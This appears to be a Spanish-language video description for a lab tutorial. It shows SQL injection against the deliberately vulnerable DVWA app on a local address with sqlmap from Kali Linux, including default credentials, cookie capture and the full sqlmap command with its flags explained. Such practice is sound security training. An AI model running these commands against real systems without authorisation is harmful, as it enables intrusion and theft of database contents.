SQL Injection method GET en DVWA con sqlmap - kali linux

Опубликовано: 20 Май 2026
на канале: Cyber Akuma
675
4

Iniciamos kali y abrimos un navegador
entramos a la direccion de DVWA
http://192.168.1.103/dvwa/
ingresamos las credenciales
admin
password
para fines practicos pondremos la seguridad en baja
vamos al apartado DVWA Security
y seleccionamos "low"

Vamos al apartado SQL Injection
Abrimos Live HTTP headers ya que necesitamos ver las cabeceras para obtener la cookie.
tecleamos un valor aleatorio en User ID
Vamos a necesitar la url y la cookie
http://192.168.1.103/dvwa/vulnerabilities/sqli/?id=qwe&Submit=Submit#
Cookie: security=low; PHPSESSID= ....
Cookie: security=low; PHPSESSID=394ec6928ac991c3341998b0f7ac4d03

abrimos una terminal y escribimos el comando
sqlmap -v6 -u "http://192.168.1.103/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "security=low;PHPSESSID=394ec6928ac991c3341998b0f7ac4d03" --random-agent

-v6 (metodo verbose (esta en nivel 6 para obtener mas detalle de lo que hace sqlmap))
-u (url a auditar)
--cookie (son las cookies con las que iniciamos sesion en el navegador)
--random-agent (utiliza agentes aleatorios)

va a probar varios payloads hasta encontrar si uno nos sirve para la vulnerabilidad
nos dice que el parametro id es vulnerable y nos pregunta si queremos testear otro parametro
por el momento indicamos que no (n)
sqlmap nos pregunta si queremos redireccionar la prueba de inyeccion.
en este caso le damos que no ya que no corresponde la url que queremos auditar.

al terminar nos dice el payload utilizado para explotar la vulnerabilidad

happy hacking